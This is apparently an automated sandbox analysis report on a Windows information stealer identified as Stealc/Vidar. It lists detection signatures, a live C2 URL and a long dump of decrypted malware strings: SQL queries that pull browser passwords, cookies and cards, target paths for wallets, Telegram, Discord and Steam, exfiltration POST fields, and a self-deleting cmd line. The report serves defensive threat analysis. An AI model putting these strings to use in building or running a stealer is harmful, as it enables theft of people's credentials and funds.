Windows Analysis Report
Vk2yYa9dHl.exe

Overview

General Information

Sample name: Vk2yYa9dHl.exe
renamed because original name is a hash value
Original sample name: 2892DDE70ACC92AF8CAFE78EC3AE1FE8.exe
Analysis ID: 1430617
MD5: 2892dde70acc92af8cafe78ec3ae1fe8
SHA1: 782fe1302e787f14ef0c650cb5268e1d7e359d05
SHA256: e0a007a54642991cf3cfc0f55c3c2b5b002c2f939135bfac2537f03f9c970ed2
Tags: exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Self deletion via cmd or bat file
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Vk2yYa9dHl.exe Avira: detected
Found malware configuration
Source: Vk2yYa9dHl.exe Malware Configuration Extractor: Vidar {"C2 url": "http://89.105.198.253/300e6d86f44da037.php"}
Source: Vk2yYa9dHl.exe.7292.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "89.105.198.253/300e6d86f44da037.php"}
Multi AV Scanner detection for submitted file
Source: Vk2yYa9dHl.exe ReversingLabs: Detection: 87%
Machine Learning detection for sample
Source: Vk2yYa9dHl.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: Vk2yYa9dHl.exe String decryptor: INSERT_KEY_HERE
Source: Vk2yYa9dHl.exe String decryptor: GetProcAddress
Source: Vk2yYa9dHl.exe String decryptor: LoadLibraryA
Source: Vk2yYa9dHl.exe String decryptor: lstrcatA
Source: Vk2yYa9dHl.exe String decryptor: OpenEventA
Source: Vk2yYa9dHl.exe String decryptor: CreateEventA
Source: Vk2yYa9dHl.exe String decryptor: CloseHandle
Source: Vk2yYa9dHl.exe String decryptor: Sleep
Source: Vk2yYa9dHl.exe String decryptor: GetUserDefaultLangID
Source: Vk2yYa9dHl.exe String decryptor: VirtualAllocExNuma
Source: Vk2yYa9dHl.exe String decryptor: VirtualFree
Source: Vk2yYa9dHl.exe String decryptor: GetSystemInfo
Source: Vk2yYa9dHl.exe String decryptor: VirtualAlloc
Source: Vk2yYa9dHl.exe String decryptor: HeapAlloc
Source: Vk2yYa9dHl.exe String decryptor: GetComputerNameA
Source: Vk2yYa9dHl.exe String decryptor: lstrcpyA
Source: Vk2yYa9dHl.exe String decryptor: GetProcessHeap
Source: Vk2yYa9dHl.exe String decryptor: GetCurrentProcess
Source: Vk2yYa9dHl.exe String decryptor: lstrlenA
Source: Vk2yYa9dHl.exe String decryptor: ExitProcess
Source: Vk2yYa9dHl.exe String decryptor: GlobalMemoryStatusEx
Source: Vk2yYa9dHl.exe String decryptor: GetSystemTime
Source: Vk2yYa9dHl.exe String decryptor: SystemTimeToFileTime
Source: Vk2yYa9dHl.exe String decryptor: advapi32.dll
Source: Vk2yYa9dHl.exe String decryptor: gdi32.dll
Source: Vk2yYa9dHl.exe String decryptor: user32.dll
Source: Vk2yYa9dHl.exe String decryptor: crypt32.dll
Source: Vk2yYa9dHl.exe String decryptor: ntdll.dll
Source: Vk2yYa9dHl.exe String decryptor: GetUserNameA
Source: Vk2yYa9dHl.exe String decryptor: CreateDCA
Source: Vk2yYa9dHl.exe String decryptor: GetDeviceCaps
Source: Vk2yYa9dHl.exe String decryptor: ReleaseDC
Source: Vk2yYa9dHl.exe String decryptor: CryptStringToBinaryA
Source: Vk2yYa9dHl.exe String decryptor: sscanf
Source: Vk2yYa9dHl.exe String decryptor: VMwareVMware
Source: Vk2yYa9dHl.exe String decryptor: HAL9TH
Source: Vk2yYa9dHl.exe String decryptor: JohnDoe
Source: Vk2yYa9dHl.exe String decryptor: DISPLAY
Source: Vk2yYa9dHl.exe String decryptor: %hu/%hu/%hu
Source: Vk2yYa9dHl.exe String decryptor: http://89.105.198.253
Source: Vk2yYa9dHl.exe String decryptor: /300e6d86f44da037.php
Source: Vk2yYa9dHl.exe String decryptor: /a50c1b38c13f8f79/
Source: Vk2yYa9dHl.exe String decryptor: meowsterioland16
Source: Vk2yYa9dHl.exe String decryptor: GetEnvironmentVariableA
Source: Vk2yYa9dHl.exe String decryptor: GetFileAttributesA
Source: Vk2yYa9dHl.exe String decryptor: GlobalLock
Source: Vk2yYa9dHl.exe String decryptor: HeapFree
Source: Vk2yYa9dHl.exe String decryptor: GetFileSize
Source: Vk2yYa9dHl.exe String decryptor: GlobalSize
Source: Vk2yYa9dHl.exe String decryptor: CreateToolhelp32Snapshot
Source: Vk2yYa9dHl.exe String decryptor: IsWow64Process
Source: Vk2yYa9dHl.exe String decryptor: Process32Next
Source: Vk2yYa9dHl.exe String decryptor: GetLocalTime
Source: Vk2yYa9dHl.exe String decryptor: FreeLibrary
Source: Vk2yYa9dHl.exe String decryptor: GetTimeZoneInformation
Source: Vk2yYa9dHl.exe String decryptor: GetSystemPowerStatus
Source: Vk2yYa9dHl.exe String decryptor: GetVolumeInformationA
Source: Vk2yYa9dHl.exe String decryptor: GetWindowsDirectoryA
Source: Vk2yYa9dHl.exe String decryptor: Process32First
Source: Vk2yYa9dHl.exe String decryptor: GetLocaleInfoA
Source: Vk2yYa9dHl.exe String decryptor: GetUserDefaultLocaleName
Source: Vk2yYa9dHl.exe String decryptor: GetModuleFileNameA
Source: Vk2yYa9dHl.exe String decryptor: DeleteFileA
Source: Vk2yYa9dHl.exe String decryptor: FindNextFileA
Source: Vk2yYa9dHl.exe String decryptor: LocalFree
Source: Vk2yYa9dHl.exe String decryptor: FindClose
Source: Vk2yYa9dHl.exe String decryptor: SetEnvironmentVariableA
Source: Vk2yYa9dHl.exe String decryptor: LocalAlloc
Source: Vk2yYa9dHl.exe String decryptor: GetFileSizeEx
Source: Vk2yYa9dHl.exe String decryptor: ReadFile
Source: Vk2yYa9dHl.exe String decryptor: SetFilePointer
Source: Vk2yYa9dHl.exe String decryptor: WriteFile
Source: Vk2yYa9dHl.exe String decryptor: CreateFileA
Source: Vk2yYa9dHl.exe String decryptor: FindFirstFileA
Source: Vk2yYa9dHl.exe String decryptor: CopyFileA
Source: Vk2yYa9dHl.exe String decryptor: VirtualProtect
Source: Vk2yYa9dHl.exe String decryptor: GetLogicalProcessorInformationEx
Source: Vk2yYa9dHl.exe String decryptor: GetLastError
Source: Vk2yYa9dHl.exe String decryptor: lstrcpynA
Source: Vk2yYa9dHl.exe String decryptor: MultiByteToWideChar
Source: Vk2yYa9dHl.exe String decryptor: GlobalFree
Source: Vk2yYa9dHl.exe String decryptor: WideCharToMultiByte
Source: Vk2yYa9dHl.exe String decryptor: GlobalAlloc
Source: Vk2yYa9dHl.exe String decryptor: OpenProcess
Source: Vk2yYa9dHl.exe String decryptor: TerminateProcess
Source: Vk2yYa9dHl.exe String decryptor: GetCurrentProcessId
Source: Vk2yYa9dHl.exe String decryptor: gdiplus.dll
Source: Vk2yYa9dHl.exe String decryptor: ole32.dll
Source: Vk2yYa9dHl.exe String decryptor: bcrypt.dll
Source: Vk2yYa9dHl.exe String decryptor: wininet.dll
Source: Vk2yYa9dHl.exe String decryptor: shlwapi.dll
Source: Vk2yYa9dHl.exe String decryptor: shell32.dll
Source: Vk2yYa9dHl.exe String decryptor: psapi.dll
Source: Vk2yYa9dHl.exe String decryptor: rstrtmgr.dll
Source: Vk2yYa9dHl.exe String decryptor: CreateCompatibleBitmap
Source: Vk2yYa9dHl.exe String decryptor: SelectObject
Source: Vk2yYa9dHl.exe String decryptor: BitBlt
Source: Vk2yYa9dHl.exe String decryptor: DeleteObject
Source: Vk2yYa9dHl.exe String decryptor: CreateCompatibleDC
Source: Vk2yYa9dHl.exe String decryptor: GdipGetImageEncodersSize
Source: Vk2yYa9dHl.exe String decryptor: GdipGetImageEncoders
Source: Vk2yYa9dHl.exe String decryptor: GdipCreateBitmapFromHBITMAP
Source: Vk2yYa9dHl.exe String decryptor: GdiplusStartup
Source: Vk2yYa9dHl.exe String decryptor: GdiplusShutdown
Source: Vk2yYa9dHl.exe String decryptor: GdipSaveImageToStream
Source: Vk2yYa9dHl.exe String decryptor: GdipDisposeImage
Source: Vk2yYa9dHl.exe String decryptor: GdipFree
Source: Vk2yYa9dHl.exe String decryptor: GetHGlobalFromStream
Source: Vk2yYa9dHl.exe String decryptor: CreateStreamOnHGlobal
Source: Vk2yYa9dHl.exe String decryptor: CoUninitialize
Source: Vk2yYa9dHl.exe String decryptor: CoInitialize
Source: Vk2yYa9dHl.exe String decryptor: CoCreateInstance
Source: Vk2yYa9dHl.exe String decryptor: BCryptGenerateSymmetricKey
Source: Vk2yYa9dHl.exe String decryptor: BCryptCloseAlgorithmProvider
Source: Vk2yYa9dHl.exe String decryptor: BCryptDecrypt
Source: Vk2yYa9dHl.exe String decryptor: BCryptSetProperty
Source: Vk2yYa9dHl.exe String decryptor: BCryptDestroyKey
Source: Vk2yYa9dHl.exe String decryptor: BCryptOpenAlgorithmProvider
Source: Vk2yYa9dHl.exe String decryptor: GetWindowRect
Source: Vk2yYa9dHl.exe String decryptor: GetDesktopWindow
Source: Vk2yYa9dHl.exe String decryptor: GetDC
Source: Vk2yYa9dHl.exe String decryptor: CloseWindow
Source: Vk2yYa9dHl.exe String decryptor: wsprintfA
Source: Vk2yYa9dHl.exe String decryptor: EnumDisplayDevicesA
Source: Vk2yYa9dHl.exe String decryptor: GetKeyboardLayoutList
Source: Vk2yYa9dHl.exe String decryptor: CharToOemW
Source: Vk2yYa9dHl.exe String decryptor: wsprintfW
Source: Vk2yYa9dHl.exe String decryptor: RegQueryValueExA
Source: Vk2yYa9dHl.exe String decryptor: RegEnumKeyExA
Source: Vk2yYa9dHl.exe String decryptor: RegOpenKeyExA
Source: Vk2yYa9dHl.exe String decryptor: RegCloseKey
Source: Vk2yYa9dHl.exe String decryptor: RegEnumValueA
Source: Vk2yYa9dHl.exe String decryptor: CryptBinaryToStringA
Source: Vk2yYa9dHl.exe String decryptor: CryptUnprotectData
Source: Vk2yYa9dHl.exe String decryptor: SHGetFolderPathA
Source: Vk2yYa9dHl.exe String decryptor: ShellExecuteExA
Source: Vk2yYa9dHl.exe String decryptor: InternetOpenUrlA
Source: Vk2yYa9dHl.exe String decryptor: InternetConnectA
Source: Vk2yYa9dHl.exe String decryptor: InternetCloseHandle
Source: Vk2yYa9dHl.exe String decryptor: InternetOpenA
Source: Vk2yYa9dHl.exe String decryptor: HttpSendRequestA
Source: Vk2yYa9dHl.exe String decryptor: HttpOpenRequestA
Source: Vk2yYa9dHl.exe String decryptor: InternetReadFile
Source: Vk2yYa9dHl.exe String decryptor: InternetCrackUrlA
Source: Vk2yYa9dHl.exe String decryptor: StrCmpCA
Source: Vk2yYa9dHl.exe String decryptor: StrStrA
Source: Vk2yYa9dHl.exe String decryptor: StrCmpCW
Source: Vk2yYa9dHl.exe String decryptor: PathMatchSpecA
Source: Vk2yYa9dHl.exe String decryptor: GetModuleFileNameExA
Source: Vk2yYa9dHl.exe String decryptor: RmStartSession
Source: Vk2yYa9dHl.exe String decryptor: RmRegisterResources
Source: Vk2yYa9dHl.exe String decryptor: RmGetList
Source: Vk2yYa9dHl.exe String decryptor: RmEndSession
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_open
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_prepare_v2
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_step
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_column_text
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_finalize
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_close
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_column_bytes
Source: Vk2yYa9dHl.exe String decryptor: sqlite3_column_blob
Source: Vk2yYa9dHl.exe String decryptor: encrypted_key
Source: Vk2yYa9dHl.exe String decryptor: PATH
Source: Vk2yYa9dHl.exe String decryptor: C:\ProgramData\nss3.dll
Source: Vk2yYa9dHl.exe String decryptor: NSS_Init
Source: Vk2yYa9dHl.exe String decryptor: NSS_Shutdown
Source: Vk2yYa9dHl.exe String decryptor: PK11_GetInternalKeySlot
Source: Vk2yYa9dHl.exe String decryptor: PK11_FreeSlot
Source: Vk2yYa9dHl.exe String decryptor: PK11_Authenticate
Source: Vk2yYa9dHl.exe String decryptor: PK11SDR_Decrypt
Source: Vk2yYa9dHl.exe String decryptor: C:\ProgramData\
Source: Vk2yYa9dHl.exe String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: Vk2yYa9dHl.exe String decryptor: browser:
Source: Vk2yYa9dHl.exe String decryptor: profile:
Source: Vk2yYa9dHl.exe String decryptor: url:
Source: Vk2yYa9dHl.exe String decryptor: login:
Source: Vk2yYa9dHl.exe String decryptor: password:
Source: Vk2yYa9dHl.exe String decryptor: Opera
Source: Vk2yYa9dHl.exe String decryptor: OperaGX
Source: Vk2yYa9dHl.exe String decryptor: Network
Source: Vk2yYa9dHl.exe String decryptor: cookies
Source: Vk2yYa9dHl.exe String decryptor: .txt
Source: Vk2yYa9dHl.exe String decryptor: TRUE
Source: Vk2yYa9dHl.exe String decryptor: FALSE
Source: Vk2yYa9dHl.exe String decryptor: autofill
Source: Vk2yYa9dHl.exe String decryptor: SELECT name, value FROM autofill
Source: Vk2yYa9dHl.exe String decryptor: history
Source: Vk2yYa9dHl.exe String decryptor: SELECT url FROM urls LIMIT 1000
Source: Vk2yYa9dHl.exe String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: Vk2yYa9dHl.exe String decryptor: name:
Source: Vk2yYa9dHl.exe String decryptor: month:
Source: Vk2yYa9dHl.exe String decryptor: year:
Source: Vk2yYa9dHl.exe String decryptor: card:
Source: Vk2yYa9dHl.exe String decryptor: Cookies
Source: Vk2yYa9dHl.exe String decryptor: Login Data
Source: Vk2yYa9dHl.exe String decryptor: Web Data
Source: Vk2yYa9dHl.exe String decryptor: History
Source: Vk2yYa9dHl.exe String decryptor: logins.json
Source: Vk2yYa9dHl.exe String decryptor: formSubmitURL
Source: Vk2yYa9dHl.exe String decryptor: usernameField
Source: Vk2yYa9dHl.exe String decryptor: encryptedUsername
Source: Vk2yYa9dHl.exe String decryptor: encryptedPassword
Source: Vk2yYa9dHl.exe String decryptor: guid
Source: Vk2yYa9dHl.exe String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: Vk2yYa9dHl.exe String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: Vk2yYa9dHl.exe String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: Vk2yYa9dHl.exe String decryptor: cookies.sqlite
Source: Vk2yYa9dHl.exe String decryptor: formhistory.sqlite
Source: Vk2yYa9dHl.exe String decryptor: places.sqlite
Source: Vk2yYa9dHl.exe String decryptor: plugins
Source: Vk2yYa9dHl.exe String decryptor: Local Extension Settings
Source: Vk2yYa9dHl.exe String decryptor: Sync Extension Settings
Source: Vk2yYa9dHl.exe String decryptor: IndexedDB
Source: Vk2yYa9dHl.exe String decryptor: Opera Stable
Source: Vk2yYa9dHl.exe String decryptor: Opera GX Stable
Source: Vk2yYa9dHl.exe String decryptor: CURRENT
Source: Vk2yYa9dHl.exe String decryptor: chrome-extension_
Source: Vk2yYa9dHl.exe String decryptor: _0.indexeddb.leveldb
Source: Vk2yYa9dHl.exe String decryptor: Local State
Source: Vk2yYa9dHl.exe String decryptor: profiles.ini
Source: Vk2yYa9dHl.exe String decryptor: chrome
Source: Vk2yYa9dHl.exe String decryptor: opera
Source: Vk2yYa9dHl.exe String decryptor: firefox
Source: Vk2yYa9dHl.exe String decryptor: wallets
Source: Vk2yYa9dHl.exe String decryptor: %08lX%04lX%lu
Source: Vk2yYa9dHl.exe String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: Vk2yYa9dHl.exe String decryptor: ProductName
Source: Vk2yYa9dHl.exe String decryptor: %d/%d/%d %d:%d:%d
Source: Vk2yYa9dHl.exe String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: Vk2yYa9dHl.exe String decryptor: ProcessorNameString
Source: Vk2yYa9dHl.exe String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: Vk2yYa9dHl.exe String decryptor: DisplayName
Source: Vk2yYa9dHl.exe String decryptor: DisplayVersion
Source: Vk2yYa9dHl.exe String decryptor: Network Info:
Source: Vk2yYa9dHl.exe String decryptor: - IP: IP?
Source: Vk2yYa9dHl.exe String decryptor: - Country: ISO?
Source: Vk2yYa9dHl.exe String decryptor: System Summary:
Source: Vk2yYa9dHl.exe String decryptor: - HWID:
Source: Vk2yYa9dHl.exe String decryptor: - OS:
Source: Vk2yYa9dHl.exe String decryptor: - Architecture:
Source: Vk2yYa9dHl.exe String decryptor: - UserName:
Source: Vk2yYa9dHl.exe String decryptor: - Computer Name:
Source: Vk2yYa9dHl.exe String decryptor: - Local Time:
Source: Vk2yYa9dHl.exe String decryptor: - UTC:
Source: Vk2yYa9dHl.exe String decryptor: - Language:
Source: Vk2yYa9dHl.exe String decryptor: - Keyboards:
Source: Vk2yYa9dHl.exe String decryptor: - Laptop:
Source: Vk2yYa9dHl.exe String decryptor: - Running Path:
Source: Vk2yYa9dHl.exe String decryptor: - CPU:
Source: Vk2yYa9dHl.exe String decryptor: - Threads:
Source: Vk2yYa9dHl.exe String decryptor: - Cores:
Source: Vk2yYa9dHl.exe String decryptor: - RAM:
Source: Vk2yYa9dHl.exe String decryptor: - Display Resolution:
Source: Vk2yYa9dHl.exe String decryptor: - GPU:
Source: Vk2yYa9dHl.exe String decryptor: User Agents:
Source: Vk2yYa9dHl.exe String decryptor: Installed Apps:
Source: Vk2yYa9dHl.exe String decryptor: All Users:
Source: Vk2yYa9dHl.exe String decryptor: Current User:
Source: Vk2yYa9dHl.exe String decryptor: Process List:
Source: Vk2yYa9dHl.exe String decryptor: system_info.txt
Source: Vk2yYa9dHl.exe String decryptor: freebl3.dll
Source: Vk2yYa9dHl.exe String decryptor: mozglue.dll
Source: Vk2yYa9dHl.exe String decryptor: msvcp140.dll
Source: Vk2yYa9dHl.exe String decryptor: nss3.dll
Source: Vk2yYa9dHl.exe String decryptor: softokn3.dll
Source: Vk2yYa9dHl.exe String decryptor: vcruntime140.dll
Source: Vk2yYa9dHl.exe String decryptor: \Temp\
Source: Vk2yYa9dHl.exe String decryptor: .exe
Source: Vk2yYa9dHl.exe String decryptor: runas
Source: Vk2yYa9dHl.exe String decryptor: open
Source: Vk2yYa9dHl.exe String decryptor: /c start
Source: Vk2yYa9dHl.exe String decryptor: %DESKTOP%
Source: Vk2yYa9dHl.exe String decryptor: %APPDATA%
Source: Vk2yYa9dHl.exe String decryptor: %LOCALAPPDATA%
Source: Vk2yYa9dHl.exe String decryptor: %USERPROFILE%
Source: Vk2yYa9dHl.exe String decryptor: %DOCUMENTS%
Source: Vk2yYa9dHl.exe String decryptor: %PROGRAMFILES%
Source: Vk2yYa9dHl.exe String decryptor: %PROGRAMFILES_86%
Source: Vk2yYa9dHl.exe String decryptor: %RECENT%
Source: Vk2yYa9dHl.exe String decryptor: *.lnk
Source: Vk2yYa9dHl.exe String decryptor: files
Source: Vk2yYa9dHl.exe String decryptor: \discord\
Source: Vk2yYa9dHl.exe String decryptor: \Local Storage\leveldb\CURRENT
Source: Vk2yYa9dHl.exe String decryptor: \Local Storage\leveldb
Source: Vk2yYa9dHl.exe String decryptor: \Telegram Desktop\
Source: Vk2yYa9dHl.exe String decryptor: key_datas
Source: Vk2yYa9dHl.exe String decryptor: D877F783D5D3EF8C*
Source: Vk2yYa9dHl.exe String decryptor: map*
Source: Vk2yYa9dHl.exe String decryptor: A7FDF864FBC10B77*
Source: Vk2yYa9dHl.exe String decryptor: A92DAA6EA6F891F2*
Source: Vk2yYa9dHl.exe String decryptor: F8806DD0C461824F*
Source: Vk2yYa9dHl.exe String decryptor: Telegram
Source: Vk2yYa9dHl.exe String decryptor: *.tox
Source: Vk2yYa9dHl.exe String decryptor: *.ini
Source: Vk2yYa9dHl.exe String decryptor: Password
Source: Vk2yYa9dHl.exe String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: Vk2yYa9dHl.exe String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: Vk2yYa9dHl.exe String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: Vk2yYa9dHl.exe String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: Vk2yYa9dHl.exe String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: Vk2yYa9dHl.exe String decryptor: 00000001
Source: Vk2yYa9dHl.exe String decryptor: 00000002
Source: Vk2yYa9dHl.exe String decryptor: 00000003
Source: Vk2yYa9dHl.exe String decryptor: 00000004
Source: Vk2yYa9dHl.exe String decryptor: \Outlook\accounts.txt
Source: Vk2yYa9dHl.exe String decryptor: Pidgin
Source: Vk2yYa9dHl.exe String decryptor: \.purple\
Source: Vk2yYa9dHl.exe String decryptor: accounts.xml
Source: Vk2yYa9dHl.exe String decryptor: dQw4w9WgXcQ
Source: Vk2yYa9dHl.exe String decryptor: token:
Source: Vk2yYa9dHl.exe String decryptor: Software\Valve\Steam
Source: Vk2yYa9dHl.exe String decryptor: SteamPath
Source: Vk2yYa9dHl.exe String decryptor: \config\
Source: Vk2yYa9dHl.exe String decryptor: ssfn*
Source: Vk2yYa9dHl.exe String decryptor: config.vdf
Source: Vk2yYa9dHl.exe String decryptor: DialogConfig.vdf
Source: Vk2yYa9dHl.exe String decryptor: DialogConfigOverlay*.vdf
Source: Vk2yYa9dHl.exe String decryptor: libraryfolders.vdf
Source: Vk2yYa9dHl.exe String decryptor: loginusers.vdf
Source: Vk2yYa9dHl.exe String decryptor: \Steam\
Source: Vk2yYa9dHl.exe String decryptor: sqlite3.dll
Source: Vk2yYa9dHl.exe String decryptor: browsers
Source: Vk2yYa9dHl.exe String decryptor: done
Source: Vk2yYa9dHl.exe String decryptor: soft
Source: Vk2yYa9dHl.exe String decryptor: \Discord\tokens.txt
Source: Vk2yYa9dHl.exe String decryptor: /c timeout /t 5 & del /f /q "
Source: Vk2yYa9dHl.exe String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: Vk2yYa9dHl.exe String decryptor: C:\Windows\system32\cmd.exe
Source: Vk2yYa9dHl.exe String decryptor: https
Source: Vk2yYa9dHl.exe String decryptor: Content-Type: multipart/form-data; boundary=----
Source: Vk2yYa9dHl.exe String decryptor: POST
Source: Vk2yYa9dHl.exe String decryptor: HTTP/1.1
Source: Vk2yYa9dHl.exe String decryptor: Content-Disposition: form-data; name="
Source: Vk2yYa9dHl.exe String decryptor: hwid
Source: Vk2yYa9dHl.exe String decryptor: build
Source: Vk2yYa9dHl.exe String decryptor: token
Source: Vk2yYa9dHl.exe String decryptor: file_name
Source: Vk2yYa9dHl.exe String decryptor: file
Source: Vk2yYa9dHl.exe String decryptor: message
Source: Vk2yYa9dHl.exe String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: Vk2yYa9dHl.exe String decryptor: screenshot.jpg
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00059540 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00059540
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00056C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00056C10
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000594A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_000594A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000655A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_000655A0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0005BF90
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCD6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CCD6C80
Uses 32bit PE files
Source: Vk2yYa9dHl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Vk2yYa9dHl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: Vk2yYa9dHl.exe, 00000000.00000002.1771981611.000000006CD3D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Vk2yYa9dHl.exe, 00000000.00000002.1771981611.000000006CD3D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
